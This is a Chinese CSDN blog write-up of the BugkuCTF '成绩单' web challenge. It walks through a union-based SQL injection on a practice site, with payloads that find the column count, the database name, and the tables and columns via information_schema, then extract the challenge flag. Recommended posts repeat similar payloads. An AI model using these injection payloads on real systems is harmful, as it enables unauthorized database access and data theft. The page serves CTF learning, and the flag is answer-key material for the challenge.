BugkuCTF 成绩单

最新推荐文章于 2022-04-13 00:42:17 发布
最新推荐文章于 2022-04-13 00:42:17 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: BugkuCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44481102/article/details/88960567
版权

在这里插入图片描述可以看出应该为sql联合注入
SQL注入之联合查询注入

  1. 要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4
    构造语句 id=0' union select 1,2,3,4#在这里插入图片描述

  2. 查询数据库
    id=0' union select 1,2,3,database()#在这里插入图片描述找到数据库 skctf_flag

  3. 查询数据表id=0' union select 1,2,3,table_name from information_schema.tables where table_schema='skctf_flag'#在这里插入图片描述找到数据表 fl4g

  4. 查询列名id=0' union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'#在这里插入图片描述找到列名为 skctf_flag

  5. 查询值id=0' union select 1,2,3,skctf_flag from fl4g#在这里插入图片描述
    得到flag BUGKU{Sql_INJECT0N_4813drd8hz4}

3tu6b0rn
关注
专栏目录
BugkuCTF-web-成绩单 writeup
kuller_Yan的博客
03-26 425
记一次简单的SQL注入 题目传送门,点击即走 首先分析题目:进入题目网页就可以看到这个 遇到表单,当然要填一填,看看有什么变化。于是我根据题目提示输入1。仔细观察可以发现输入1,并且返回后,出现了龙龙龙的成绩单以及四份数据。 于是打开hackbar,post提交 正常返回,加 ’ 测试一下 啥也不是,再加个 # 又正常了。 那么基本可以认定是SQL注入无疑了。 两种解题方法: 1:手...
BugkuCTF成绩单(web)
s0il的博客
04-02 764
题目描述: 让人看上去就是SQL注入。 提交一下,出现三列属性,flag就应该在这里面: 手动注入: 在表单中输入1或者1#或者1--或者1++等返回正常,输入1'返回异常 库名、表名、字段名的获取: 联合查询 id=-1' union select 1,2,3,4# 之后返回: 或者执行-1' orde...
bugkuctf 成绩单
舞动的獾
06-20 704
bugkuctf成绩单 用hackbar插件的post对它进行测试,之前测试了出现人的成绩单,所以测试4,或者更高. id=1' order by 5# 没有回显,所以试试4 id=1' order by 4# 所以可以知道有四列 尝试联合查询 记得把前面的查询数据置空,写成id=0即可,显示正常,说明确确实实存在这四列数据 id=0' union select 1,2,3,4 # ...
BugkuCTF】Web--成绩单
VZZmieshenquan的博客
02-09 1095
Description: 快来查查成绩吧 http://123.206.87.240:8002/chengjidan/ Solution: Flag:
BugkuCTF成绩单查询
qq_33505576的博客
06-27 740
SQL注入 https://blog.csdn.net/Langtuteng17/article/details/80666660
MySQL的information_schema数据库
简单即美
09-07 1122
摘自http://www.cnitman.com/mysql-information_schema-explain/;可对照参考文档来理解,http://dev.mysql.com/doc/refman/5.1/en/information-schema.html 大家在安
BugkuCTF练习题解——Web一
qq_41739275的博客
08-24 6580
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 1972
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
BugkuCTF——最新web篇writeup(持续更新)
1匹黑马
11-16 3782
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
CTFBugku 成绩单
weixin_41607190的博客
11-04 231
这道题很久之前就看到过了,现在才弄明白。。。 这么输入有回显 这么输入就没有了,为什么呢 当我们用查询语句 select * from emp order by x 假如emp这个表的字段有10个,那么x的值就只能是1-10 如果超过10,就不回显 所以说明显示只有4列,并没有隐藏什么 接下来就是爆库、爆表、包字段了 数据库叫skctf_flag,database()函数可以返回当前的数据...
成绩单
WYJ____的博客
08-15 484
0' union select 1,2,3,4# 0' union select 1,database(),3,4#    0' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='skctf_flag'# 0' union select 1...
bugku ctf 成绩单 (类似sql注入)
qq_42777804的博客
08-15 1044
原始界面    与以往的sql注入不同,直接在成绩查询栏中 注入     随便输入数字 发现居然会出现显示位 之后猜测应该有3个以上的显示位,因为成绩就已经有了3个 ?id=1' union select 1,2,3# 发现没有反应 那么就四个 ?id=1' union select 1,2,3,4#     发现了4个 ,那我们就用最后一个   先...
BugkuCTF Web】成绩单
_Kisaragi_的博客
07-17 302
题目描述: 进入题目页面: 随便输入一点东西看看,输入1: 输入2: 初步判断这是一个查询系统,应该和SQL注入有关。 先看看回显字段个数,假设有4个回显字段,在查询框中输入语句: 1' order by 4# 正常回显: 将4改成5,再试试: 1' order by 5# 回显消失了,说明回显字段的个数是4个。 下面获取回显位置,构造语句: -1' union select 1, 2, 3, 4# 从图中我们可以得知,表格中回显的位置是2,3,4
ctf-web-成绩查询
god_001的博客
04-13 1147
题目: 打开网页: 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时: 查看源代码: 发现,表单使用post方式提交,并且name="id" 猜测使用SQL注入 首先检测闭合方式: 分别post id=1' id=1" 发现post id=1"时,正常,post id=1'时无响应 应该是单引号 ' ' 闭合 再通过order by查询当前表列数: 于是可以判断...
Bugku CTF-web17 成绩单
weixin_44023403的博客
05-15 344
Bugku CTF-web17成绩单前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy
BugkuCTF-web-成绩单 WP
会下雪的晴天
07-12 1687
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 个人收获:最基本的SQL注入 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 题目描述 解题传送门:http://123.206.87.240:8002/chengjidan/ 解题思路 查看源...
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值